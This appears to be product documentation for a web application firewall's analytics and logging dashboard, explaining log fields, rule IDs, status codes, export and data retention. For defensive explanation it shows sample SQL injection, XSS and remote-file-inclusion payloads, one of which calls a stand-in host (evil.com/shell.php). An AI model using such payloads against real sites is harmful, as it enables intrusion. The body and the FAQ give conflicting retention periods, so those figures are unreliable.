Analytics & Logs
The Analytics tab provides real-time insights into your website traffic, security events, and WAF activity.
Traffic Statistics
Overview Metrics
Total Requests: Total number of HTTP requests received by your site.
Unique Visitors: Number of unique IP addresses that accessed your site.
Blocked Requests: Number of requests blocked by WAF, rate limiting, or access control.
Attack Types: Breakdown of detected attack patterns.
WAF Logs
WAF logs show security events where the Web Application Firewall blocked or detected malicious requests.
Log Fields
Timestamp: When the event occurred (in your timezone).
IP Address: The attacker’s IP address.
Rule ID: The WAF rule that triggered (e.g., 920100).
Message: Description of the attack detected.
URI: The URL path that was attacked.
Group: Which WAF ruleset detected the attack (OWASP CRS, WordPress, etc.).
Understanding WAF Logs
High rule IDs (900000+): OWASP Core Rule Set detections
Medium rule IDs (200000+): WordPress-specific rules
Low rule IDs: Custom or Comodo rules
Common Attack Types
SQL Injection (942xxx rules)
- Attempts to inject SQL commands into your database
- Example:
?id=1' OR '1'='1
Cross-Site Scripting (941xxx rules)
- Attempts to inject malicious JavaScript
- Example:
<script>alert('XSS')</script>
Remote File Inclusion (931xxx rules)
- Attempts to include remote files
- Example:
?page=http://evil.com/shell.php
Scanner Detection (913xxx rules)
- Automated security scanners probing your site
- Example: Nikto, SQLMap, etc.
Access Logs
Access logs show all HTTP requests to your site, including both legitimate and blocked traffic.
Log Fields
Timestamp: When the request was made.
IP Address: The visitor’s IP address.
Method: HTTP method (GET, POST, PUT, DELETE).
URI: The requested URL path.
Status Code: HTTP response code (200, 403, 404, etc.).
User Agent: The visitor’s browser/client information.
HTTP Status Codes
2xx Success
200 OK: Request succeeded201 Created: Resource created successfully
3xx Redirection
301 Moved Permanently: Permanent redirect302 Found: Temporary redirect
4xx Client Errors
400 Bad Request: Malformed request403 Forbidden: Access denied (blocked by WAF/access control)404 Not Found: Resource doesn’t exist429 Too Many Requests: Rate limit exceeded
5xx Server Errors
500 Internal Server Error: Backend server error502 Bad Gateway: Backend server unreachable503 Service Unavailable: Server overloaded
Filtering Logs
Use the date filters to view logs for specific time periods:
Date Range: Select start and end dates to filter logs.
Quick Filters: Today, Yesterday, Last 7 Days, Last 30 Days.
Search: Search for specific IPs, URIs, or rule IDs.
Exporting Logs
You can export logs for analysis or compliance:
- Set your desired date range
- Click the Export button
- Choose format (CSV, JSON)
- Download the file
Use cases:
- Security audits
- Compliance reporting
- Incident investigation
- Performance analysis
Charts & Visualizations
Traffic Over Time
Line chart showing request volume over time. Helps identify:
- Traffic patterns
- Attack spikes
- Unusual activity
Top Attackers
Bar chart showing IPs with the most blocked requests. Helps identify:
- Persistent attackers
- IPs to blacklist
- Attack sources
Attack Types Distribution
Pie chart showing breakdown of attack types. Helps identify:
- Most common attacks
- Rule effectiveness
- Security priorities
Geographic Distribution
Map showing request origins by country. Helps identify:
- Legitimate traffic sources
- Attack origins
- Geographic patterns
Best Practices
- Review logs daily – Check for new attack patterns
- Investigate 403 errors – May indicate false positives
- Monitor top attackers – Consider blacklisting persistent IPs
- Export logs regularly – For compliance and long-term analysis
- Set up alerts – Get notified of unusual activity (coming soon)
Troubleshooting
Logs not appearing
- Check that DNS is properly configured
- Verify traffic is flowing through Atomic Edge
- Wait a few minutes for logs to process
Too many false positives
- Review WAF logs to identify problematic rules
- Disable specific rules causing issues
- Contact support for rule tuning
Missing legitimate traffic
- Check if IPs are blacklisted
- Verify geographic restrictions
- Review rate limiting settings
Data Retention
Log retention periods:
- WAF Logs: 90 days
- Access Logs: 30 days
- Traffic Statistics: 1 year
Important: Export logs if you need longer retention for compliance.
Privacy & Compliance
Atomic Edge logs contain:
- IP addresses (personal data under GDPR)
- Request details (URLs, user agents)
- Timestamps
Compliance considerations:
- Logs are stored securely and encrypted
- Access is restricted to your account
- You can export and delete logs as needed
- IP addresses can be anonymized on request
GDPR compliance:
- Logs are necessary for security purposes (legitimate interest)
- You are the data controller for your site’s logs
- Users can request their data through you
Frequently Asked Questions
What traffic statistics does Atomic Edge provide?
Understanding your analytics dashboardAtomic Edge tracks total requests, unique visitors (by IP), blocked requests (WAF, rate limiting, access control), and attack type breakdown. View hourly, daily, or monthly trends. The Analytics tab provides real-time insights into your traffic patterns and security events.
How do I read WAF logs?
Understanding WAF log fields and dataWAF logs show: Timestamp (when event occurred), IP Address (attacker’s IP), Rule ID (WAF rule triggered, e.g., 920100), Message (attack description), URI (attacked URL path), and Group (ruleset that detected it—OWASP CRS, WordPress, etc.).
What do WAF rule ID numbers mean?
Decoding WAF rule identificationRule IDs indicate the detection source: 900000+ are OWASP Core Rule Set, 200000+ are WordPress-specific rules, lower IDs are custom or Comodo rules. Examples: 942xxx = SQL Injection, 941xxx = Cross-Site Scripting (XSS), 931xxx = Remote File Inclusion, 913xxx = Scanner Detection.
What are access logs?
HTTP request logging overviewAccess logs show all HTTP requests to your site, including legitimate traffic and blocked requests. Fields: Timestamp, IP Address, HTTP Method (GET/POST/etc.), URI, Status Code (200, 403, 404, etc.), and User Agent (browser/client info). Use these for traffic analysis and debugging.
What do HTTP status codes mean in my logs?
Understanding response code categories2xx = Success (200 OK, 201 Created). 3xx = Redirects (301 Permanent, 302 Temporary). 4xx = Client errors (400 Bad Request, 403 Forbidden/blocked, 404 Not Found, 429 Rate Limited). 5xx = Server errors (500 Internal Error, 502 Bad Gateway, 503 Unavailable).
How do I filter and search my logs?
Finding specific log entriesUse the search/filter controls to narrow results by IP address, URI path, rule ID, ruleset group, status code, or date range. This helps identify attack patterns, troubleshoot blocked legitimate traffic, or analyze specific user sessions.
What is SQL Injection and how is it detected?
Understanding SQL injection attacks (942xxx rules)SQL injection attempts to inject malicious SQL commands into your database through user input. Example: ?id=1′ OR ‘1’=’1. WAF rules 942xxx detect these patterns. If you see these in logs, your WAF is blocking database attacks—no action needed unless it’s a false positive.
What is Cross-Site Scripting (XSS)?
Understanding XSS attacks (941xxx rules)XSS attacks inject malicious JavaScript into pages viewed by other users. Example: alert(‘XSS’). WAF rules 941xxx detect these. Blocked XSS attempts appear in logs when attackers try to compromise your visitors’ browsers through your site.
How long are logs retained?
Log data retention policiesLog retention varies by plan tier. Free plans retain logs for 7 days. Advanced plans retain 30 days. Enterprise plans have configurable retention up to 90 days. Export logs if you need longer retention for compliance or forensic purposes.
What is scanner detection (913xxx rules)?
Identifying automated security scannersScanner detection rules (913xxx) identify automated tools probing your site for vulnerabilities—Nikto, SQLMap, Nmap, and similar. High scanner activity may indicate targeted reconnaissance. Block these IPs or enable captcha challenges to deter automated attacks.